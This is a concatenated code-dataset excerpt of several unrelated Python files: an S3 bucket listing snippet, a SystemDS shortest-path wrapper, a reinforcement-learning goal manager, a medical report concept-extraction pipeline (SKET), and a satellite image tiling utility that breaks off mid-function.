# if the bucket has any objects, print the name of each object
if raw_response['KeyCount']>0:
print("Files for bucket: {}".format(bucketName))
# for each object in the bucket
for bucket_object in raw_response['Contents']:
# print the name of the object
print(bucket_object['Key'])
else:
print("No files found in bucket: {}".format(bucketName))
| 3.359375 | 3 |
src/main/python/systemds/operator/algorithm/builtin/shortestPath.py | mdbloice/systemds | 372 | 12770804 | <reponame>mdbloice/systemds
# -------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -------------------------------------------------------------
# Autogenerated By : src/main/python/generator/generator.py
# Autogenerated From : scripts/builtin/shortestPath.dml
from typing import Dict, Iterable
from systemds.operator import OperationNode, Matrix, Frame, List, MultiReturn, Scalar
from systemds.script_building.dag import OutputType
from systemds.utils.consts import VALID_INPUT_TYPES
def shortestPath(G: Matrix,
                 sourceNode: int,
                 **kwargs: Dict[str, VALID_INPUT_TYPES]):
    """
    Compute minimum-distance shortest paths from ``sourceNode`` to all other
    nodes of the graph described by the adjacency matrix ``G``.

    :param G: adjacency matrix; entries can be 0/1 (connectivity only) or
        integer weights/distances between nodes (0 if not connected)
    :param sourceNode: node index to calculate the shortest paths from
    :param kwargs: optional named arguments forwarded to the DML builtin,
        e.g. ``maxi`` (max number of iterations, 0 meaning unlimited) and
        ``verbose`` (flag for verbose debug output)
    :return: 'OperationNode' containing the minimum shortest-path distance
        from vertex i to vertex j; an infinite distance means the two nodes
        are not connected
    """
    # collect required and optional arguments for the underlying DML builtin
    params_dict = {'G': G, 'sourceNode': sourceNode}
    params_dict.update(kwargs)
    return Matrix(G.sds_context,
        'shortestPath',
        named_input_nodes=params_dict)
| 1.804688 | 2 |
gnet/gnet_manager_four_rooms_subgoals_3d.py | jleung1/goal_modelling_rl | 0 | 12770805 | <filename>gnet/gnet_manager_four_rooms_subgoals_3d.py
from gnet.gnet_manager import GNetManager
import numpy as np
DEBUG = False
class FourRoomSubgoals3DGNetManager(GNetManager):
    """Goal manager for the 3-D four-rooms task with two colored subgoals.

    The goal state is a 5-vector: [x, y, yellow subgoal visited,
    blue subgoal visited, goal reached] (see current_goal_state).
    When ``qrm`` is set, the aggregate goal "reached all subgoals" is
    interpreted as "reach whichever subgoal is still missing".
    """

    def __init__(self, env, gnet_goals, qrm=False):
        super().__init__(env, gnet_goals, last_num_goals=50, max_exploration_rate=0.8)

        # Goal space is [x, y, yellow subgoal visited, blue subgoal visited, goal reached]
        self.target_goal_state = [0, 0, 0, 0, 0]
        self.gnet_goals = gnet_goals
        self.qrm = qrm

        # sticky flags: once a subgoal is reached it stays reached until reset()
        self.reached_yellow_subgoal = False
        self.reached_blue_subgoal = False

        self.goal_space_size = 5
        self.action_space_size = 3

    def get_goal_state(self, selected_goal):
        """Build the target goal-state vector for *selected_goal*.

        Fills (x, y) with the position of the relevant object and flips the
        corresponding "achieved" flag. Positions use pos[0]/pos[2], i.e. the
        ground-plane coordinates of the 3-D environment.
        """
        self.target_goal_state = self.current_goal_state()
        if selected_goal == "reached yellow subgoal" or (
            self.qrm
            and selected_goal == "reached all subgoals"
            and not self.reached_yellow_subgoal
        ):
            x = self.env.yellow_subgoal.pos[0]
            y = self.env.yellow_subgoal.pos[2]
            self.target_goal_state[2] = True
        elif selected_goal == "reached blue subgoal" or (
            self.qrm
            and selected_goal == "reached all subgoals"
            and not self.reached_blue_subgoal
        ):
            x = self.env.blue_subgoal.pos[0]
            y = self.env.blue_subgoal.pos[2]
            self.target_goal_state[3] = True
        elif selected_goal == "end":
            x = self.env.goal.pos[0]
            y = self.env.goal.pos[2]
            self.target_goal_state[4] = True

        self.target_goal_state[0] = x
        self.target_goal_state[1] = y

        return self.target_goal_state

    def check_goal_satisfied(self, selected_goal):
        """Return True (and latch the flag) when *selected_goal* was just achieved.

        The `A and B or C` conditions parse as `(A and B) or C` — the flag
        guard applies only to the non-qrm branch.
        """
        if (
            selected_goal == "reached yellow subgoal"
            and not self.reached_yellow_subgoal
            or (
                self.qrm
                and selected_goal == "reached all subgoals"
                and not self.reached_yellow_subgoal
            )
        ):
            # latch the environment's flag locally
            self.reached_yellow_subgoal = self.env.reached_yellow_subgoal
            if self.reached_yellow_subgoal:
                if DEBUG:
                    print("reached yellow subgoal!")
                return True
        elif (
            selected_goal == "reached blue subgoal"
            and not self.reached_blue_subgoal
            or (
                self.qrm
                and selected_goal == "reached all subgoals"
                and not self.reached_blue_subgoal
            )
        ):
            self.reached_blue_subgoal = self.env.reached_blue_subgoal
            if self.reached_blue_subgoal:
                if DEBUG:
                    print("reached blue subgoal!")
                return True
        elif selected_goal == "end":
            # proximity test supplied by the environment
            satisfied = self.env.near(self.env.goal)
            if satisfied:
                if DEBUG:
                    print("goal reached!")
                return True

        return False

    def check_goal_relabel(self, start_goal, selected_goal):
        """Side-effect-free satisfaction test used for hindsight relabeling.

        Unlike check_goal_satisfied, this only checks proximity and does not
        mutate any flags; under qrm, "reached all subgoals" is checked against
        the subgoal opposite to *start_goal*.
        """
        satisfied = False
        if selected_goal == "reached yellow subgoal" or (
            self.qrm
            and start_goal == "reached blue subgoal"
            and selected_goal == "reached all subgoals"
        ):
            satisfied = self.env.near(self.env.yellow_subgoal)
        elif selected_goal == "reached blue subgoal" or (
            self.qrm
            and start_goal == "reached yellow subgoal"
            and selected_goal == "reached all subgoals"
        ):
            satisfied = self.env.near(self.env.blue_subgoal)
        elif selected_goal == "end":
            satisfied = self.env.near(self.env.goal)
        return satisfied

    def current_goal_state(self):
        """Return [x, y, yellow visited, blue visited, near goal] for the agent."""
        x = self.env.agent.pos[0]
        y = self.env.agent.pos[2]
        return [
            x,
            y,
            self.reached_yellow_subgoal,
            self.reached_blue_subgoal,
            self.env.near(self.env.goal),
        ]

    def reset(self):
        """Clear the subgoal latches and the target goal state for a new episode."""
        super().reset()
        self.reached_yellow_subgoal = False
        self.reached_blue_subgoal = False
        self.target_goal_state = [0, 0, False, False, False]
| 2.375 | 2 |
MedTAG_Dockerized/MedTAG_sket_dock_App/sket/sket/sket.py | MedTAG/medtag-core | 6 | 12770806 | <filename>MedTAG_Dockerized/MedTAG_sket_dock_App/sket/sket/sket.py
import os
import uuid
import json
from .rep_proc.report_processing import ReportProc
from .ont_proc.ontology_processing import OntoProc
from .nerd.nerd import NERD
from .rdf_proc.rdf_processing import RDFProc
from .utils import utils
class SKET(object):
    def __init__(
            self,
            use_case, src_lang,
            biospacy="en_core_sci_sm", biow2v=True, biofast=None, biobert=None, str_match=False, gpu=None, rules=None, dysplasia_mappings=None, cin_mappings=None,
            ontology_path=None, hierarchies_path=None,
            fields_path=None
    ):
        """
        Load SKET components

        Params:
            SKET:
                use_case (str): considered use case
                src_lang (str): considered language
            NERD:
                biospacy (str): full spaCy pipeline for biomedical data
                biow2v (bool): whether to use biospacy to perform semantic matching or not
                biofast (str): biomedical fasttext model
                biobert (str): biomedical bert model
                str_match (bool): string matching
                gpu (int): use gpu when using BERT
                rules (str): hand-crafted rules file path
                dysplasia_mappings (str): dysplasia mappings file path
                cin_mappings (str): cin mappings file path
            OntoProc:
                ontology_path (str): ontology.owl file path
                hierarchies_path (str): hierarchy relations file path
            ReportProc:
                fields_path (str): report fields file path

        Returns: None
        """

        # load Named Entity Recognition and Disambiguation (NERD)
        self.nerd = NERD(biospacy, biow2v, str_match, biofast, biobert, rules, dysplasia_mappings, cin_mappings, gpu)
        # load Ontology Processing (OntoProc)
        self.onto_proc = OntoProc(ontology_path, hierarchies_path)
        # load Report Processing (ReportProc)
        self.rep_proc = ReportProc(src_lang, use_case, fields_path)
        # load RDF Processing (RDFProc)
        self.rdf_proc = RDFProc()
        # define set of ad hoc labeling operations @smarchesin TODO: add 'custom' to lung too if required
        # structure: hospital -> use case -> labeling flavor -> utils mapper
        self.ad_hoc_exa_labeling = {
            'aoec': {
                'colon': {
                    'original': utils.aoec_colon_concepts2labels,
                    'custom': utils.aoec_colon_labels2binary},
                'cervix': {
                    'original': utils.aoec_cervix_concepts2labels,
                    'custom': utils.aoec_cervix_labels2aggregates},
                'lung': {
                    'original': utils.aoec_lung_concepts2labels}
            },
            'radboud': {
                'colon': {
                    'original': utils.radboud_colon_concepts2labels,
                    'custom': utils.radboud_colon_labels2binary},
                'cervix': {
                    'original': utils.radboud_cervix_concepts2labels,
                    'custom': utils.radboud_cervix_labels2aggregates}
            }
        }
        # hospital-agnostic labeling operations: use case -> flavor -> mapper
        self.ad_hoc_med_labeling = {
            'colon': {
                'original': utils.colon_concepts2labels,
                'custom': utils.colon_labels2binary
            },
            'cervix': {
                'original': utils.cervix_concepts2labels,
                'custom': utils.cervix_labels2aggregates
            },
            'lung': {
                'original': utils.lung_concepts2labels
            }
        }

        # set use case
        self.use_case = use_case
        # restrict hand-crafted rules and mappings based on use case
        # (order matters: self.nerd must exist before restriction, and
        # self.onto before the preferred-term extraction below)
        self.nerd.restrict2use_case(use_case)
        # restrict onto concepts to the given use case
        self.onto = self.onto_proc.restrict2use_case(use_case)
        # restrict concept preferred terms (i.e., labels) given the use case
        self.onto_terms = self.nerd.process_ontology_concepts([term.lower() for term in self.onto['label'].tolist()])
def update_nerd(
self,
biospacy="en_core_sci_lg", biofast=None, biobert=None, str_match=False, rules=None, dysplasia_mappings=None, cin_mappings=None, gpu=None):
"""
Update NERD model w/ input parameters
Params:
biospacy (str): full spaCy pipeline for biomedical data
biofast (str): biomedical fasttext model
biobert (str): biomedical bert model
str_match (bool): string matching
rules (str): hand-crafted rules file path
dysplasia_mappings (str): dysplasia mappings file path
cin_mappings (str): cin mappings file path
gpu (int): use gpu when using BERT
Returns: None
"""
# update nerd model
self.nerd = NERD(biospacy, biofast, biobert, str_match, rules, dysplasia_mappings, cin_mappings, gpu)
# restrict hand-crafted rules and mappings based on current use case
self.nerd.restrict2use_case(self.use_case)
def update_usecase(self, use_case):
"""
Update use case and dependent functions
Params:
use_case (str): considered use case
Returns: None
"""
if use_case not in ['colon', 'cervix', 'lung']: # raise exception
print('current supported use cases are: "colon", "cervix", and "lung"')
raise Exception
# set use case
self.use_case = use_case
# update report processing
self.rep_proc.update_usecase(self.use_case)
# restrict hand-crafted rules and mappings based on use case
self.nerd.restrict2use_case(use_case)
# restrict onto concepts to the given use case
self.onto = self.onto_proc.restrict2use_case(use_case)
# restrict concept preferred terms (i.e., labels) given the use case
self.onto_terms = self.nerd.process_ontology_concepts([term.lower() for term in self.onto['label'].tolist()])
def update_nmt(self, src_lang):
"""
Update NMT model changing source language
Params:
src_lang (str): considered source language
Returns: None
"""
# update NMT model
self.rep_proc.update_nmt(src_lang)
def update_report_fields(self, fields):
"""
Update report fields changing current ones
Params:
fields (list): report fields
Returns: None
"""
# update report fields
self.rep_proc.fields = fields
@staticmethod
def store_reports(reports, r_path):
"""
Store reports
Params:
reports (dict): reports
r_path (str): reports file path
Returns: None
"""
with open(r_path, 'w') as out:
json.dump(reports, out, indent=4)
@staticmethod
def load_reports(r_fpath):
"""
Load reports
Params:
r_fpath (str): reports file path
Returns: reports
"""
with open(r_fpath, 'r') as rfp:
reports = json.load(rfp)
return reports
    @staticmethod
    def store_concepts(concepts, c_fpath):
        """
        Store extracted concepts as JSON dict

        Params:
            concepts (dict): dict containing concepts extracted from reports
            c_fpath (str): concepts file path

        Returns: None
        """

        # serialization is delegated to the shared utils helper so the
        # on-disk format stays consistent across the SKET tools
        utils.store_concepts(concepts, c_fpath)
    @staticmethod
    def store_labels(labels, l_fpath):
        """
        Store mapped labels as JSON dict

        Params:
            labels (dict): dict containing labels mapped from extracted concepts
            l_fpath (str): labels file path

        Returns: None
        """

        # serialization is delegated to the shared utils helper so the
        # on-disk format stays consistent across the SKET tools
        utils.store_labels(labels, l_fpath)
def store_rdf_graphs(self, graphs, g_fpath):
"""
Store RDF graphs w/ RDF serialization format
Params:
graphs (list): list containing (s,p,o) triples representing ExaMode report(s)
g_fpath (str): graphs file path
Returns: None
"""
rdf_format = g_fpath.split('.')[-1]
if rdf_format not in ['ttl', 'n3', 'trig']: # raise exception
print('provide correct format: "ttl", "n3", or "trig".')
raise Exception
rdf_format = 'turtle' if rdf_format == 'ttl' else rdf_format
self.rdf_proc.serialize_report_graphs(graphs, output=g_fpath, rdf_format=rdf_format)
@staticmethod
def store_json_graphs(graphs, g_fpath):
"""
Store RDF graphs w/ JSON serialization format
Params:
graphs (dict): dict containing (s,p,o) triples representing ExaMode report(s)
g_fpath (str): graphs file path
Returns: None
"""
os.makedirs(os.path.dirname(g_fpath), exist_ok=True)
with open(g_fpath, 'w') as out:
json.dump(graphs, out, indent=4)
# EXAMODE RELATED FUNCTIONS
    def prepare_exa_dataset(self, ds_fpath, sheet, header, hospital, ver, ds_name=None, debug=False):
        """
        Prepare ExaMode batch data to perform NERD

        The processed and translated intermediate results are cached under
        ./dataset/processed and ./dataset/translated; existing cache files
        short-circuit the corresponding stage.

        Params:
            ds_fpath (str): examode dataset file path
            sheet (str): name of the excel sheet to use
            header (int): row index used as header
            hospital (str): considered hospital
            ver (int): data format version
            ds_name (str): dataset name
            debug (bool): whether to keep flags for debugging

        Returns: translated, split, and prepared dataset
        """

        # get dataset name from file path if not provided
        if not ds_name:
            ds_name = ds_fpath.split('/')[-1].split('.')[0]  # ./dataset/raw/aoec/####.csv

        # set output directories
        proc_out = './dataset/processed/' + hospital + '/' + self.use_case + '/'
        trans_out = './dataset/translated/' + hospital + '/' + self.use_case + '/'

        if os.path.isfile(trans_out + ds_name + '.json'):  # translated reports file already exists
            # full cache hit: nothing to process or translate
            print('translated reports file already exist -- remove it before running "exa_pipeline" to reprocess it')
            trans_reports = self.load_reports(trans_out + ds_name + '.json')
            return trans_reports
        elif os.path.isfile(proc_out + ds_name + '.json'):  # processed reports file already exists
            # partial cache hit: reuse the processed reports, translate only
            print('processed reports file already exist -- remove it before running "exa_pipeline" to reprocess it')
            proc_reports = self.load_reports(proc_out + ds_name + '.json')
            if hospital == 'aoec':
                # translate reports
                trans_reports = self.rep_proc.aoec_translate_reports(proc_reports)
            elif hospital == 'radboud':
                # translate reports
                trans_reports = self.rep_proc.radboud_translate_reports(proc_reports)
            else:  # raise exception
                print('provide correct hospital info: "aoec" or "radboud"')
                raise Exception

            if not os.path.exists(trans_out):  # dir not exists -- make it
                os.makedirs(trans_out)
            # store translated reports
            self.store_reports(trans_reports, trans_out + ds_name + '.json')
            return trans_reports
        else:  # neither processed nor translated reports files exist
            # cold start: load, process (per hospital/format version), translate
            # load dataset
            dataset = self.rep_proc.load_dataset(ds_fpath, sheet, header)
            if hospital == 'aoec':
                if ver == 1:  # process data using method v1
                    proc_reports = self.rep_proc.aoec_process_data(dataset)
                else:  # process data using method v2
                    proc_reports = self.rep_proc.aoec_process_data_v2(dataset, debug=debug)
                # translate reports
                trans_reports = self.rep_proc.aoec_translate_reports(proc_reports)
            elif hospital == 'radboud':
                if ver == 1:  # process data using method v1
                    proc_reports = self.rep_proc.radboud_process_data(dataset, debug=debug)
                else:  # process data using method v2
                    proc_reports = self.rep_proc.radboud_process_data_v2(dataset)
                # translate reports
                trans_reports = self.rep_proc.radboud_translate_reports(proc_reports)
            else:  # raise exception
                print('provide correct hospital info: "aoec" or "radboud"')
                raise Exception

            if not os.path.exists(proc_out):  # dir not exists -- make it
                os.makedirs(proc_out)
            # store processed reports
            self.store_reports(proc_reports, proc_out + ds_name + '.json')
            if not os.path.exists(trans_out):  # dir not exists -- make it
                os.makedirs(trans_out)
            # store translated reports
            self.store_reports(trans_reports, trans_out + ds_name + '.json')
            return trans_reports
def exa_entity_linking(self, reports, hospital, sim_thr=0.7, raw=False, debug=False):
"""
Perform entity linking based on ExaMode reports structure and data
Params:
reports (dict): dict containing reports -- can be either one or many
hospital (str): considered hospital
sim_thr (float): keep candidates with sim score greater than or equal to sim_thr
raw (bool): whether to return concepts within semantic areas or mentions+concepts
debug (bool): whether to keep flags for debugging
Returns: a dict containing concepts from input reports
"""
# perform entity linking
if hospital == 'aoec': # AOEC data
concepts = self.nerd.aoec_entity_linking(reports, self.onto_proc, self.onto, self.onto_terms, self.use_case, sim_thr, raw, debug=debug)
elif hospital == 'radboud': # Radboud data
concepts = self.nerd.radboud_entity_linking(reports, self.onto, self.onto_terms, self.use_case, sim_thr, raw, debug=debug)
else: # raise exception
print('provide correct hospital info: "aoec" or "radboud"')
raise Exception
return concepts
def exa_labeling(self, concepts, hospital):
"""
Map extracted concepts to pre-defined labels
Params:
concepts (dict): dict containing concepts extracted from report(s)
hospital (str): considered hospital
Returns: a dict containing labels from input report(s)
"""
if hospital not in ['aoec', 'radboud']:
print('provide correct hospital info: "aoec" or "radboud"')
raise Exception
labels = self.ad_hoc_exa_labeling[hospital][self.use_case]['original'](concepts)
return labels
def create_exa_graphs(self, reports, concepts, hospital, struct=False, debug=False):
"""
Create report graphs in RDF format
Params:
reports (dict): dict containing reports -- can be either one or many
concepts (dict): dict containing concepts extracted from report(s)
hospital (str): considered hospital
struct (bool): whether to return graphs structured as dict
debug (bool): whether to keep flags for debugging
Returns: list of (s,p,o) triples representing report graphs and dict structuring report graphs (if struct==True)
"""
if hospital == 'aoec': # AOEC data
create_graph = self.rdf_proc.aoec_create_graph
elif hospital == 'radboud': # Radboud data
create_graph = self.rdf_proc.radboud_create_graph
else: # raise exception
print('provide correct hospital info: "aoec" or "radboud"')
raise Exception
rdf_graphs = []
struct_graphs = []
# convert report data into (s,p,o) triples
for rid in reports.keys():
rdf_graph, struct_graph = create_graph(rid, reports[rid], concepts[rid], self.onto_proc, self.use_case, debug=debug)
rdf_graphs.append(rdf_graph)
struct_graphs.append(struct_graph)
if struct: # return both rdf and dict graphs
return rdf_graphs, struct_graphs
else:
return rdf_graphs
    def exa_pipeline(self, ds_fpath, sheet, header, ver, use_case=None, hosp=None, sim_thr=0.7, raw=False, debug=False):
        """
        Perform the complete SKET pipeline over ExaMode data:
            - (i) Load dataset
            - (ii) Process dataset
            - (iii) Translate dataset
            - (iv) Perform entity linking and store concepts
            - (v) Perform labeling and store labels
            - (vi) Create RDF graphs and store graphs

        Params:
            ds_fpath (str): dataset file path
            sheet (str): name of the excel sheet to use
            header (int): row index used as header
            ver (int): data format version
            use_case (str): considered use case
            hosp (str): considered hospital ('aoec' or 'radboud'); inferred from ds_fpath when omitted
            sim_thr (float): keep candidates with sim score greater than or equal to sim_thr
            raw (bool): whether to return concepts within semantic areas or mentions+concepts
            debug (bool): whether to keep flags for debugging.

        Returns: the extracted concepts when raw is True, otherwise None (all outputs are written to disk)
        """
        if use_case:  # update to input use case
            self.update_usecase(use_case)
        # get dataset name
        ds_name = ds_fpath.split('/')[-1].split('.')[0]  # ./dataset/raw/aoec/####.csv
        if hosp:  # update to input hospital
            if hosp not in ['aoec', 'radboud']:
                print('provide correct hospital info: "aoec" or "radboud"')
                raise Exception
            else:
                hospital = hosp
        else:
            # get hospital name from the parent directory of the dataset file
            hospital = ds_fpath.split('/')[-2]  # ./dataset/raw/ --> aoec <-- /####.csv
        # set output directories
        # NOTE(review): these paths are relative to the CWD, unlike med_pipeline
        # which resolves them against this module's directory -- confirm intended
        if raw:  # return mentions+concepts (used for EXATAG)
            concepts_out = './outputs/concepts/raw/' + hospital + '/' + self.use_case + '/'
        else:  # perform complete pipeline (used for SKET/CERT/EXANET)
            concepts_out = './outputs/concepts/refined/' + hospital + '/' + self.use_case + '/'
        labels_out = './outputs/labels/' + hospital + '/' + self.use_case + '/'
        rdf_graphs_out = './outputs/graphs/rdf/' + hospital + '/' + self.use_case + '/'
        struct_graphs_out = './outputs/graphs/json/' + hospital + '/' + self.use_case + '/'
        # prepare dataset
        reports = self.prepare_exa_dataset(ds_fpath, sheet, header, hospital, ver, ds_name, debug=debug)
        # perform entity linking
        concepts = self.exa_entity_linking(reports, hospital, sim_thr, raw, debug=debug)
        # store concepts
        self.store_concepts(concepts, concepts_out + 'concepts_' + ds_name + '.json')
        if raw:  # return mentions+concepts without labeling/graph creation
            return concepts
        # perform labeling
        labels = self.exa_labeling(concepts, hospital)
        # store labels
        self.store_labels(labels, labels_out + 'labels_' + ds_name + '.json')
        # create RDF graphs
        rdf_graphs, struct_graphs = self.create_exa_graphs(reports, concepts, hospital, struct=True, debug=debug)
        # store RDF graphs in three serializations of the same data
        self.store_rdf_graphs(rdf_graphs, rdf_graphs_out + 'graphs_' + ds_name + '.n3')
        self.store_rdf_graphs(rdf_graphs, rdf_graphs_out + 'graphs_' + ds_name + '.trig')
        self.store_rdf_graphs(rdf_graphs, rdf_graphs_out + 'graphs_' + ds_name + '.ttl')
        # store JSON graphs
        self.store_json_graphs(struct_graphs, struct_graphs_out + 'graphs_' + ds_name + '.json')
# GENERAL-PURPOSE FUNCTIONS
def prepare_med_dataset(self, ds, ds_name, src_lang=None, store=False, debug=False):
"""
Prepare dataset to perform NERD
Params:
ds (dict): dataset
ds_name (str): dataset name
src_lang (str): considered language
store (bool): whether to store concepts, labels, and RDF graphs
debug (bool): whether to keep flags for debugging
Returns: translated, split, and prepared dataset
"""
# set output directories
workpath = os.path.dirname(os.path.abspath(__file__))
proc_path_par = os.path.join(workpath, os.pardir)
proc_out = os.path.join(proc_path_par, './dataset/processed/' + self.use_case + '/')
trans_out = os.path.join(proc_path_par, './dataset/translated/' + self.use_case + '/')
# process reports
proc_reports = self.rep_proc.process_data(ds, debug=debug)
if store: # store processed reports
os.makedirs(proc_out, exist_ok=True)
self.store_reports(proc_reports, proc_out + ds_name + '.json')
if src_lang != 'en': # translate reports
trans_reports = self.rep_proc.translate_reports(proc_reports)
else: # keep processed reports
trans_reports = proc_reports
if store: # store translated reports
os.makedirs(trans_out, exist_ok=True)
self.store_reports(trans_reports, trans_out + ds_name + '.json')
return trans_reports
def med_entity_linking(self, reports, sim_thr=0.7, raw=False, debug=False):
"""
Perform entity linking on input reports
Params:
reports (dict): dict containing reports -- can be either one or many
sim_thr (float): keep candidates with sim score greater than or equal to sim_thr
raw (bool): whether to return concepts within semantic areas or mentions+concepts
debug (bool): whether to keep flags for debugging
Returns: a dict containing concepts from input reports
"""
# perform entity linking
concepts = self.nerd.entity_linking(reports, self.onto, self.onto_terms, self.use_case, sim_thr, raw, debug=debug)
return concepts
def med_labeling(self, concepts):
"""
Map extracted concepts to pre-defined labels
Params:
concepts (dict): dict containing concepts extracted from report(s)
Returns: a dict containing labels from input report(s)
"""
labels = self.ad_hoc_med_labeling[self.use_case]['original'](concepts)
return labels
def create_med_graphs(self, reports, concepts, struct=False, debug=False):
"""
Create report graphs in RDF format
Params:
reports (dict): dict containing reports -- can be either one or many
concepts (dict): dict containing concepts extracted from report(s)
struct (bool): whether to return graphs structured as dict
debug (bool): whether to keep flags for debugging
Returns: list of (s,p,o) triples representing report graphs and dict structuring report graphs (if struct==True)
"""
rdf_graphs = []
struct_graphs = []
# convert report data into (s,p,o) triples
for rid in reports.keys():
rdf_graph, struct_graph = self.rdf_proc.create_graph(rid, reports[rid], concepts[rid], self.onto_proc, self.use_case, debug=debug)
rdf_graphs.append(rdf_graph)
struct_graphs.append(struct_graph)
if struct: # return both rdf and dict graphs
return rdf_graphs, struct_graphs
else:
return rdf_graphs
    def med_pipeline(self, ds, src_lang=None, use_case=None, sim_thr=0.7, store=False, raw=False, debug=False):
        """
        Perform the complete SKET pipeline over generic data:
            - (i) Process dataset
            - (ii) Translate dataset
            - (iii) Perform entity linking (and store concepts)
            - (iv) Perform labeling (and store labels)
            - (v) Create RDF graphs (and store graphs)
            - (vi) Return concepts, labels, and RDF graphs
        When raw == True: perform steps i-iii and return mentions+concepts
        When store == True: store concepts, labels, and RDF graphs

        Params:
            ds (dict): dataset
            src_lang (str): considered language
            use_case (str): considered use case
            sim_thr (float): keep candidates with sim score greater than or equal to sim_thr
            store (bool): whether to store concepts, labels, and RDF graphs
            raw (bool): whether to return concepts within semantic areas or mentions+concepts
            debug (bool): whether to keep flags for debugging

        Returns: (concepts, labels, rdf_graphs), or just concepts when raw is True
        """
        if use_case:  # update to input use case
            self.update_usecase(use_case)
        if src_lang:  # update to input source language
            self.update_nmt(src_lang)
        # set output directories relative to this module rather than the CWD
        workpath = os.path.dirname(os.path.abspath(__file__))
        out_path = os.path.join(workpath, os.pardir)
        if raw:  # return mentions+concepts (used for EXATAG)
            concepts_out = os.path.join(out_path,'./outputs/concepts/raw/' + self.use_case + '/')
        else:  # perform complete pipeline (used for SKET/CERT/EXANET)
            concepts_out = os.path.join(out_path, './outputs/concepts/refined/' + self.use_case + '/')
        labels_out = os.path.join(out_path, './outputs/labels/' + self.use_case + '/')
        rdf_graphs_out = os.path.join(out_path, './outputs/graphs/rdf/' + self.use_case + '/')
        struct_graphs_out = os.path.join(out_path, './outputs/graphs/json/' + self.use_case + '/')
        # set dataset name -- random UUID so repeated runs never collide on disk
        ds_name = str(uuid.uuid4())
        # prepare dataset
        reports = self.prepare_med_dataset(ds, ds_name, src_lang, store, debug=debug)
        # perform entity linking
        concepts = self.med_entity_linking(reports, sim_thr, raw, debug=debug)
        if store:  # store concepts
            self.store_concepts(concepts, concepts_out + 'concepts_' + ds_name + '.json')
        if raw:  # return mentions+concepts without labeling/graph creation
            return concepts
        # perform labeling
        labels = self.med_labeling(concepts)
        if store:  # store labels
            self.store_labels(labels, labels_out + 'labels_' + ds_name + '.json')
        # create RDF graphs
        rdf_graphs, struct_graphs = self.create_med_graphs(reports, concepts, struct=True, debug=debug)
        if store:  # store graphs
            # RDF graphs in three serializations of the same data
            self.store_rdf_graphs(rdf_graphs, rdf_graphs_out + 'graphs_' + ds_name + '.n3')
            self.store_rdf_graphs(rdf_graphs, rdf_graphs_out + 'graphs_' + ds_name + '.trig')
            self.store_rdf_graphs(rdf_graphs, rdf_graphs_out + 'graphs_' + ds_name + '.ttl')
            # JSON graphs
            self.store_json_graphs(struct_graphs, struct_graphs_out + 'graphs_' + ds_name + '.json')
        return concepts, labels, rdf_graphs
| 2 | 2 |
satellite/output/slicer.py | mtsmarcoto/deep-learning | 0 | 12770807 | <gh_stars>0
import logging
import os
import gdal
from satellite import settings
from os.path import basename
from PIL import Image
class Slicer:
    """
    When inferring, images with bigger dimensions than the ones used for training
    must be handled before prediction. This class provides the utilities for that,
    with cropping/slicing (and re-merging) procedures.
    """

    def slice_bitmap(self, file, width, height, output_folder):
        """
        Open the non-geographic image file and crop it into equally sized tiles
        of width x height, placed in output_folder. Partial border tiles are skipped.

        :param file: absolute image path [oversized image]
        :param width: the desired tile width
        :param height: the desired tile height
        :param output_folder: the destination folder of the tiles/slices
        :return paths: a list of absolute paths, one per tile cropped (None on missing file)
        """
        logging.info(">>>> Slicing image " + file + "...")

        filename = basename(file)
        name, file_extension = os.path.splitext(filename)

        if not os.path.isfile(file):
            logging.info(">>>>>> Image {} does not exist. Check it and try again!".format(filename))
            return

        image = Image.open(file)
        cols, rows = image.size  # PIL size is (width, height): cols = width, rows = height

        cont = 0
        paths = []
        buffer = settings.BUFFER_TO_INFERENCE
        # j walks the y axis (bounded by rows == image height) and i walks the
        # x axis (bounded by cols == image width). The previous version swapped
        # cols/rows in the loop bounds and guards, which produced wrong tiles
        # for non-square images; this now mirrors slice_geographic's behaviour.
        for j in range(0, rows, (height - buffer)):
            for i in range(0, cols, (width - buffer)):
                output_file = os.path.join(output_folder, name + "_" + "{:05d}".format(cont) + file_extension)

                # skip partial tiles that would fall outside the image bounds
                if not ((i + width) > cols) and not ((j + height) > rows):
                    # crop box is (left, upper, right, lower)
                    image.crop((i, j, i + width, j + height)).save(output_file)
                    paths.append(output_file)
                    cont += 1
        return paths

    def slice_geographic(self, file, width, height, output_folder):
        """
        Open the geographic image file and crop it into equally sized tiles of
        width x height, placed in output_folder. Partial border tiles are skipped.

        :param file: absolute image path [oversized image]
        :param width: the desired tile width
        :param height: the desired tile height
        :param output_folder: the destination folder of the tiles/slices
        :return paths: a list of absolute paths, one per tile cropped (None on failure)
        """
        logging.info(">>>> Slicing image " + file + "...")

        filename = basename(file)
        name, file_extension = os.path.splitext(filename)

        if not os.path.isfile(file):
            logging.info(">>>>>> Image {} does not exist. Check it and try again!".format(filename))
            return

        ds = gdal.Open(file)
        if ds is None:
            logging.info(">>>>>> Could not open image file. Check it and try again!")
            return

        cont = 0
        # NOTE: despite the names, RasterXSize is the raster WIDTH and
        # RasterYSize its HEIGHT, so `rows` bounds the x axis below and
        # `cols` bounds the y axis -- the loops are consistent with that.
        rows = ds.RasterXSize
        cols = ds.RasterYSize
        datatype = ds.GetRasterBand(1).DataType

        paths = []
        gdal.UseExceptions()
        buffer = settings.BUFFER_TO_INFERENCE
        for j in range(0, cols, (height - buffer)):
            for i in range(0, rows, (width - buffer)):
                output_file = os.path.join(output_folder, name + "_" + "{:05d}".format(cont) + file_extension)
                try:
                    # skip partial tiles that would fall outside the raster bounds
                    if not ((i + width) > rows) and not ((j + height) > cols):
                        # srcWin is [xoff, yoff, xsize, ysize]; -eco/-epo make
                        # gdal error out on windows outside the raster extent
                        gdal.Translate(output_file, ds, format='GTIFF', srcWin=[i, j, width, height],
                                       outputType=datatype, options=['-eco', '-epo',
                                                                     '-b', settings.RASTER_TILES_COMPOSITION[0],
                                                                     '-b', settings.RASTER_TILES_COMPOSITION[1],
                                                                     '-b', settings.RASTER_TILES_COMPOSITION[2]])
                        paths.append(output_file)
                        cont += 1
                except RuntimeError:
